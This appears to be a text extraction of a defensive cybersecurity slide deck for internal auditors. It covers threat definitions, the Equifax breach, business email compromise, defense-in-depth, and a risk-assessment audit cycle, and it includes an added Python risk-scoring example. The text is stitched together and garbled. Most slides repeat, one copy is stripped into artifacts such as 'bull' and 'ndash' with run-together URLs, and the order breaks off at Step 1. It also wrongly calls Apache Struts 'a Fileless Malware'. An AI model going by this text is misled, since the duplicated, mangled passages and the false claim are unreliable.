https://www.businessinsider.com/hackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
https://jsis.washington.edu/news/cyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
ATTACKS IN THE HEADLINES
https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html
https://www.wired.com/story/reaper-iot-botnet-infected-million-networks
COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves without the other two parties knowing.
SQL Injection and Cross-site Scripting Attacks – Attacks in which the attacker injects malicious code into a website. In SQL Injection the attacker uses the SQL language to obtain information back from the website that was unintended. In Cross-site Scripting the attacker injects code that only impacts other users of the website.
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malware and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and Ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a version of Malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained Malware in 2016
• "Fileless" Malware is a new variant that is more difficult to detect
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a Bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a Fileless Malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and Healthcare companies both in February)
• The WannaCry Ransomware attack impacted over 200,000 people across 150 countries (it included a Worm)
RANSOMWARE
Ransomware-as-a-Service allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the Ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident:
  • All nine lost at least $1 Million due to a BEC scam
  • Two companies lost more than $30 Million each
  • In total the nine issuers lost almost $100 Million
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of Spear Phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO Email to Treasurer
• HR Phishing for Employee Data
• W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment.
PHISHING EMAIL EXAMPLE
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution, offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a Phishing email
BEC ATTACK WALKTHROUGH
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Elevation rules for overdue receivables
Cash Disbursement
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of the information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider: Treasury, Payroll, Royalties, SOX Impact, Cyber Insurance, Legal Liabilities, Contract Language
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE – TECHNOLOGY – PROCESSES
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report → Repeat
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks in order to identify, estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
Key to an effective cybersecurity program is to understand the Company's information assets:
• What Value Do the Assets Have?
  • Credit Card Data
  • Employee or Customer Records
  • Bank Accounts
  • Intellectual Property
  • Trade Secrets
  • Insider Knowledge
• Data Location
• Cash In / Cash Out Processes
• Who Would Want the Data?
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
[Example screenshot of a critical data asset risk assessment]
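The Step 1 risk assessment (asset identification, classification and threat modeling giving a calculated risk per asset and threat) feeds directly into the Step 3 controls analysis, steps A to D on the Mitigating Control Counts slide. The following is an added example, not part of the presentation, that works both steps through on a constructed asset register: the scoring formula, the threat-to-control mapping and all asset data are assumptions, the control names are taken from CIS Controls v7, and the 100-point threshold is the one quoted on the Step 3 slide.

```python
"""Added example (not from the presentation): a semi-quantitative model of the
Step 1 risk assessment feeding the Step 3 controls analysis (steps A to D).
Scoring formula, threat-to-control mapping and asset data are assumptions /
constructed samples; control names are from CIS Controls v7."""
from collections import Counter

RISK_THRESHOLD = 100   # the "> 100" cut quoted on the Step 3 slide

# Step 1: identification, location and classification (1 = low, 5 = critical)
ASSETS = {
    "ERP":           {"location": "on-prem datacenter", "classification": 5},
    "HR_portal":     {"location": "SaaS",               "classification": 4},
    "Fileshare":     {"location": "on-prem",            "classification": 3},
    "Marketing_web": {"location": "cloud VM",           "classification": 1},
}

# Step 1 threat modeling per asset: (threat, likelihood 1-10, impact 1-10)
THREATS = {
    "ERP":           [("Ransomware", 6, 9), ("Privileged account misuse", 4, 8), ("Phishing / BEC", 7, 5)],
    "HR_portal":     [("Phishing / BEC", 8, 6), ("Unpatched vulnerability", 5, 7)],
    "Fileshare":     [("Ransomware", 7, 6), ("Unpatched vulnerability", 5, 4)],
    "Marketing_web": [("Unpatched vulnerability", 8, 5)],
}

# Assumed mapping from each modeled threat to the controls that mitigate it
MITIGATING_CONTROLS = {
    "Ransomware": ["CSC 8 Malware Defenses", "CSC 10 Data Recovery Capabilities",
                   "CSC 17 Security Awareness and Training"],
    "Privileged account misuse": ["CSC 4 Controlled Use of Administrative Privileges",
                                  "CSC 16 Account Monitoring and Control"],
    "Phishing / BEC": ["CSC 7 Email and Web Browser Protections",
                       "CSC 17 Security Awareness and Training"],
    "Unpatched vulnerability": ["CSC 3 Continuous Vulnerability Management",
                                "CSC 2 Inventory of Authorized Software"],
}


def risk_score(classification, likelihood, impact):
    """Assumed semi-quantitative formula: asset classification x likelihood x impact."""
    return classification * likelihood * impact


def calculated_risks(assets=ASSETS, threats=THREATS):
    """Step 1 output: {(asset, threat): calculated risk}."""
    return {(asset, threat): risk_score(assets[asset]["classification"], likelihood, impact)
            for asset, modeled in threats.items()
            for threat, likelihood, impact in modeled}


def systems_above_threshold(risks, threshold=RISK_THRESHOLD):
    """Step 3A: information systems with any calculated risk above the threshold."""
    return sorted({asset for (asset, _), score in risks.items() if score > threshold})


def mitigating_control_counts(risks, controls=MITIGATING_CONTROLS, threshold=RISK_THRESHOLD):
    """Steps 3B-3D: for every (system, threat) pair whose specific-threat risk is
    over the threshold, look up the mitigating controls and count each instance
    where a control reduces risk."""
    counts = Counter()
    for (asset, threat), score in risks.items():
        if score > threshold:                 # 3B: specific threat over 100?
            counts.update(controls[threat])   # 3C + 3D: tally the controls
    return counts


def prioritized_controls(counts):
    """Controls that reduce risk on the most (system, threat) pairs come first."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    risks = calculated_risks()
    for (asset, threat), score in sorted(risks.items(), key=lambda kv: -kv[1]):
        print(f"{asset:14} {threat:28} risk={score}")
    print("Systems over threshold:", systems_above_threshold(risks))
    for control, n in prioritized_controls(mitigating_control_counts(risks)):
        print(f"{n:2}  {control}")
```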
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
https://www.zdnet.com/article/man-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable/
https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/comment-page-1/
https://www.scmagazine.com/home/security-news/cisco-patches-prime-license-manager-sql-injection-vulnerability/
https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions/
18
COMMON TERMS AND DEFINITIONS
Common Vulnerabilities and Exposures (CVE) – A catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may let the attacker gather knowledge or content. Many of the malware outbreaks and cyber attacks in the news resulted from attackers exploiting a vulnerability that had been known, and fixed by the vendor, for several months or years but was never fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect because of the lack of knowledge and support from the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
19
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is a type of malware that has been in the headlines
• Malware can grant command and control of a device to the hackers
• 1 in 131 emails contained malware in 2016
• "Fileless" malware is a newer variant that is more difficult to detect
20
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerability and Exposure)
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• The hackers then used another vulnerability (a Fileless Malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• The hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
21
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
22
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible through normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that, along with all Bitcoin transactions, is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process (that is, the amount of computing power involved) increases.
23
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the user's files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• Bitcoin is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017; they have since dropped but are still present (HR and Healthcare companies, both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
24
RANSOMWARE
Ransomware-as-a-Service (RaaS) allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS handles the ransom payments. The RaaS developer takes a cut of any payments that are made, and will reduce their cut depending on the volume of payments received.
25
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain money or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
• All nine lost at least $1 million due to the BEC scam
• Two companies lost more than $30 million each
• In total the nine issuers lost almost $100 million
26
BEC & PHISHING
Phishing: A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing: Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (reusing a previous legitimate email) and Whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
27
PHISHING EMAIL EXAMPLE
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
28
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is inside email and Office 365
• Some attack vectors do not require a phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Elevation rules for overdue receivables
Cash Disbursements
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider: Treasury, Payroll, Royalties, Cyber Insurance, Legal Liabilities, Contract Language, SOX Impact
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
DEFENSE IN-DEPTH APPROACH
A Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
CYBERSECURITY DEFENSE IN-DEPTH
• Patch Management
• Operating System EOL
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation / Endpoint Protection
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
35
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report
36
STEP 1 - CYBERSECURITY RISK ASSESSMENT
